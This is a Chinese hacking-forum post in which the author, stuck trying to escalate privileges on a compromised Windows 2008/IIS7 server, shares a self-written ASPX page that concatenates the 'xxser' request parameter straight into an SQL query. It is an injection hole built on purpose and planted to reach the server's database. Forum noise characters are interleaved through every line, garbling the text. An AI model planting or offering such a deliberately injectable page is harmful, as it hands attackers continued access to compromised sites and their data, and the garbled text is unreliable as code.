昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。8 v$ ?$ q6 C+ E4 n3 B8 H) N% U
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
1 j8 A; k6 L' H( a0 A1 E代码量不多,自己写个拉倒了。烦死了。: G6 I6 T. O# ` S) e3 D3 @
; l8 X, V. t% J( Z j) }7 |
) w( Z# ^" C# b( `- m* D# Z& u* N<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
' [8 z, C: h3 v<html xmlns="http://www.w3.org/1999/xhtml">
3 z& P* I9 L0 `6 C; |6 m<head runat="server">/ h9 e- j$ b$ [6 \3 X
<title>暗影aspx构造注射专用页面</title>
" [# a$ r- }) G( U! _</head># v0 v" {% d- V0 J
<body>
* z4 u, C" o3 l9 ^ <form id="form1" runat="server">
2 R7 T, b0 ?/ r& n <div>
+ c7 O: b( V& c, p. T: a <script language="c#" runat="server">, n8 y8 r5 C" o
& F5 N' t) r( H; J2 _! O$ h void page_init(object sender, EventArgs e)
9 E& a9 k0 g, u- N% c$ o {& l% D( \* i, ^+ x1 `4 k
. {6 Y* j% x2 c. ^/ M System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
/ L( ]+ x/ H1 k, V( ?3 u5 y4 S ?
( M" A n$ C- P* X conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();( D) G/ l3 c y0 s& y8 k7 f& D
conn.Open();
! `+ Z" ~/ W& k8 @& g7 ~& I
# G: [; Z, W( t9 B, ^' H$ j string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=13 C+ P5 y, U9 f% T
% D; d& @7 B: z! F System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
0 u9 a$ \0 G( T; `2 G# t! t int x = command.ExecuteNonQuery();) C5 W4 K3 q2 @9 v) |9 {
Response.Write(i+"\n");( O N; @8 V& B' S- A
Response.Write(x);4 i* Y7 @$ z4 V! R
conn.Close();2 Q/ u" W i4 r6 @
}4 j6 \* [: }6 A8 q8 i# H+ s* ~6 b
' P# T0 t2 b4 n! Q
</script>
1 y+ v3 ~- N* q0 V </div>
2 R, a( ^0 M F1 ?3 o- M </form>( R" t& E- x% t: ^: W0 a3 F0 J
</body>
. n% |( i0 g7 g2 u0 r</html>
1 ~: C* B4 l3 X5 j ^ |
发表于 2013-3-20 21:32:01
收藏
支持
反对